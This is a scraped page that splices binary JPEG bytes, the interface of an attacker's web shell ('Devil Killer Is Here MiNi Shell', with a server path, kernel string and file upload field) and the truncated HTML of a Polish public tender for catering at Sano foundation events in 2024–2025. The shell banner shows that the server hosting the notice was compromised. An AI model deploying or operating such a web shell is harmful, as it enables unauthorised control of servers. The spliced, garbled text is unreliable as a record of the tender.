JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241002/0052741501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa cateringu podczas wydarzeń szkoleniowych i konferencyjnych dla Sano- listopad 2024 i styczeń 2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sano - Centrum Zindywidualizowanej Medycyny Obliczeniowej - Międzynarodowa Fundacja Badawcza</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sano - Centrum Zindywidualizowanej Medycyny Obliczeniowej - Międzynarodowa Fundacja Badawcza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384298430</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Czarnowiejska 36 budynek C5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-054</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">procurement@sanoscience.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sano.science</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa cateringu podczas wydarzeń szkoleniowych i konferencyjnych dla Sano- listopad 2024 i styczeń 2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0be02c7e-e646-44c0-b922-145f57e49cee</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00527415</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt Sano (H2020, Teaming for Excellence Phase 2); nr umowy: 857533 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sano_czmo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Strona internetowa prowadzonego postępowania:<br/>https://platformazakupowa.pl/pn/sano_czmo<br/><br/>Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści niniejszej specyfikacji warunków zamówienia („SWZ”) oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia:<br/>https://platformazakupowa.pl/pn/sano_czmo<br/><br/>Zamawiający informuje, że komunikacja z Wykonawcami odbywa się wyłącznie za pomocą odnośnika „Wyślij wiadomość do zamawiającego”, który znajduje się na stronie internetowej prowadzonego postępowania, tj.:<br/>https://platformazakupowa.pl/pn/sano_czmo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta wraz z dołączonymi do niej dokumentami musi być sporządzona pod rygorem nieważności w formie elektronicznej tj. dokumentu opatrzonego kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej tj. dokumentu opatrzonego podpisem zaufanym lub elektronicznym podpisem osobistym. <br/>2. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie PZP, odbywa się przy użyciu środków komunikacji elektronicznej wyłącznie za pośrednictwem Platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/sano_czmo<br/>3.	Za datę wpływu oświadczeń, dokumentów, wniosków, zawiadomień oraz informacji w postaci elektronicznej, przyjmuje się datę ich złożenia/wysłania na Platformie. <br/>4.	Wymagania techniczne i organizacyjne związane z wykorzystaniem Platformy znajdują się na stronie Platformy w:<br/>- instrukcjach dla wykonawców „platformazakupowa.pl” OpenNexus dostępnych pod linkiem: https://platformazakupowa.pl/strona/45-instrukcje <br/>- Regulaminie platformazakupowa.pl dostępnym pod linkiem: https://platformazakupowa.pl/strona/1-regulamin <br/>5.	W zakresie pytań technicznych związanych z działaniem systemu Wykonawca może skontaktować się z Centrum Wsparcia Klienta platformazakupowa.pl, <br/>pod numerem 22 101 02 02, adres mailowy: cwk@platformazakupowa.pl<br/>6.	Komunikacja za pośrednictwem Platformy Zakupowej (nie dotyczy składania i wycofania ofert) odbywa się za pośrednictwem dedykowanego formularza dostępnego na platformie https://platformazakupowa.pl/pn/sano_czmo, wszelkie dokumenty w postępowaniu składane są przez Wykonawcę za pośrednictwem platformy jako załączniki.<br/>7.	Szczegółowe wymagania techniczne dla dokumentów elektronicznych oraz wymagania techniczne i organizacyjne użycia środków komunikacji elektronicznej służących do odbioru dokumentów elektronicznych zostały określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 r., poz. 2452). <br/>8. Wymagania umożliwiające korzystanie z platformy zakupowej oraz zasady korzystania z platformy opisane zostały w rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">23.1	Stosownie do art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Sano - Centrum Zindywidualizowanej Medycyny Obliczeniowej –Międzynarodowa Fundacja Badawcza z siedzibą w (30-072) Kraków, KRS 0000797490, NIP 6772446472, REGON 38429843000000. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Michała Kosobudzkiego, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@sanoscience.org.<br/>23.2	Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. <br/>23.3	Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności <br/>23.4	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>23.5	Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP oraz inne podmioty realizujące zadania na rzecz Zamawiającego czy też podmioty, którym Zamawiający jest zobowiązany udostępnić przedmiotowe dane osobowe z uwagi na obowiązujące powszechnie przepisy prawa w tym do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych<br/>23.6	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>23.7	Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. <br/>23.8	Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">23.9	Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1)	dostępu do swoich danych osobowych – zgodnie z art. 15 RODO;<br/>2)	do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>3)	ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>4)	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych oraz do organu nadzorczego w państwie członkowskim swojego zwykłego pobytu, swojego miejsca pracy lub miejsca popełnienia domniemanego naruszenia.<br/>23.10	Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>23.11	Dane osobowe zostały pozyskane od podmiotu, który odpowiedział na ogłoszenie o zamówieniu publicznym.<br/>23.12	Zamawiający będzie przetwarzał kategorie danych osobowych podane w odpowiedzi na ogłoszenie o zamówieniu publicznym, w szczególności dane kontaktowe, ewentualnie dane potwierdzające określone kwalifikacje czy też miejsce zatrudnienia jak i dane identyfikujące</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">34/2024/Z</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I- Usługa cateringu dla Sano w dniu 15 listopada 2024 r. na wydarzeniu <br/>„Gala Innowatorów Dziecięcych Szpitali”<br/> Przedmiotem zamówienia jest świadczenie usługi cateringu podczas wydarzenia „Gala Innowatorów Dziecięcych Szpitali”<br/> obejmującej przygotowanie, dostarczenie i podanie posiłków i napojów , bieżącą obsługę podczas Wydarzenia, a także<br/> zapewnienie dodatkowych działań na warunkach i w zakresie wskazanym w Opisie Przedmiotu Zamówienia, stanowiącym<br/> załącznik nr 1 do SWZ.<br/><br/> Realizacja zamówienia odbędzie się w dniu 15 listopada 2024 r. w godzinach<br/> a) godzina rozpoczęcia wydarzenia 17:00<br/> b) godzina zakończenia wydarzenia 22:00.<br/><br/> Miejscem realizacji zamówienia będzie Centralny Dom Technologii, ul. Krucza 50, 00-025 Warszawa.<br/><br/> Usługa cateringu obejmuje:<br/> a) transport cateringu;<br/> b) dojazd do i z miejsca realizacji zamówienia;<br/> c) wniesienie i rozłożenie miejsc cateringowych<br/> d) udostępnienie niezbędnej zastawy porcelanowej, szklanek, naczyń, sztućców, podgrzewaczy, zaparzaczy, ekspresów do<br/> kawy (ciśnieniowych), serwetek i innych urządzeń, naczyń oraz akcesoriów potrzebnych do realizacji zamówienia;<br/> e) obsługę kelnerską adekwatną do liczby konsumentów, która zapewni na bieżąco sprzątanie brudnych naczyń, a także<br/> odpadów powstałych w trakcie cateringu, dostarczanie czystych naczyń, uzupełnianie miejsca kawowego i poszczególnych<br/> bufetów;<br/> f) stoły wraz z nakryciem potrzebne do przygotowania miejsca kawowego oraz bufetów;<br/> g) stoły koktajlowe w ilości odpowiedniej dla 120 osób wraz z obrusami (pokrowcami) z tkaniny w jednakowym kolorze,<br/> odpowiednimi dla tych stołów,<br/> h) sprzątanie cateringu wraz z zebraniem i wywiezieniem odpadów powstałych po cateringu.<br/><br/> Catering powinien zostać przygotowany w ilości odpowiedniej dla 120 osób.<br/><br/> Catering obejmuje (dokładny zakres cateringu został wskazany w Tabeli nr 1 OPZ):<br/> a) Miejsce kawowe – 1 stanowisko na 120 osób;<br/> b) Bufet słony - 1 stanowisko na 120 osób;<br/> c) Bufet słodki- 1 stanowisko na 120 osób; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">55310000-6 - Restauracyjne usługi kelnerskie</p> <p class="mb-0">55330000-2 - Usługi kawiarniane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-15 do 2024-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przyjęte kryteria oceny ofert dla wszystkich części postępowania:<br/> Cena - waga kryterium 100%<br/> W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru zgodnie z pkt 18.2 SWZ.<br/> Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr 2 do SWZ).<br/> Za najkorzystniejszą ofertę uznana zostanie oferta wykonawcy, która uzyska największą, liczbę punktów.<br/> Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie,<br/> zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/> dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II- Usługa cateringu dla Sano w dniu 27 listopada 2024 r. na wydarzeniu Sano Science Day.<br/> Przedmiotem zamówienia jest świadczenie usługi cateringu podczas wydarzenia Sano Science Day, obejmującej<br/> przygotowanie, dostarczenie i podanie posiłków i napojów , bieżącą obsługę podczas wydarzenia, a także zapewnienie<br/> dodatkowych działań na warunkach i w zakresie wskazanym w Opisie Przedmiotu Zamówienia (“OPZ”) stanowiący<br/> Załącznik nr 1 do SWZ.<br/> Realizacja wydarzenia odbędzie się w dniu 27 listopada 2024 r. w godzinach: <br/>c) godzina rozpoczęcia wydarzenia 9:00<br/> d) godzina zakończenia wydarzenia 19:00.<br/> Miejscem realizacji zamówienia będzie Centrum Energetyki AGH, ul. Czarnowiejska 36 budynek C5, 30-054 Kraków.<br/> Usługa cateringu obejmuje:<br/> a) transport cateringu;<br/> b) dojazd do i z miejsca realizacji zamówienia;<br/> c) wniesienie i rozłożenie miejsc cateringowych<br/> d) udostępnienie niezbędnej zastawy porcelanowej, szklanek, naczyń, sztućców, podgrzewaczy, zaparzaczy, ekspresów do<br/> kawy (ciśnieniowych), serwetek i innych urządzeń, naczyń oraz akcesoriów potrzebnych do realizacji zamówienia;<br/> e) obsługę kelnerską adekwatną do liczby konsumentów, która zapewni na bieżąco sprzątanie brudnych naczyń, a także<br/> odpadów powstałych w trakcie cateringu, dostarczanie czystych naczyń, uzupełnianie miejsca kawowego i poszczególnych<br/> bufetów;<br/> f) stoły wraz z nakryciem potrzebne do przygotowania miejsca kawowego oraz bufetów;<br/> g) stoły koktajlowe do lunchu i bufetu w ilości odpowiedniej dla 80 osób wraz z obrusami (pokrowcami) z tkaniny w<br/> jednakowych kolorach, odpowiednimi dla tych stołów,<br/> h) sprzątanie cateringu wraz z zebraniem i wywiezieniem odpadów powstałych po cateringu.<br/> Catering obejmuje (dokładny zakres cateringu został wskazany w Tabeli nr 2 OPZ):<br/> a) Miejsce kawowe –2 stanowiska dla łącznie 100 osób;<br/> b) Lunch - dla 80 osób;<br/> c) Bufet słony- 1 stanowisko dla 80 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <p class="mb-0">55310000-6 - Restauracyjne usługi kelnerskie</p> <p class="mb-0">55330000-2 - Usługi kawiarniane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-27 do 2024-11-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przyjęte kryteria oceny ofert dla wszystkich części postępowania:<br/> Cena - waga kryterium 100%<br/> W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru zgodnie z pkt 18.2 SWZ.<br/> Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (załącznik nr 2 do SWZ).<br/> Za najkorzystniejszą ofertę uznana zostanie oferta wykonawcy, która uzyska największą, liczbę punktów.<br/> Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie,<br/> zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/> dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub 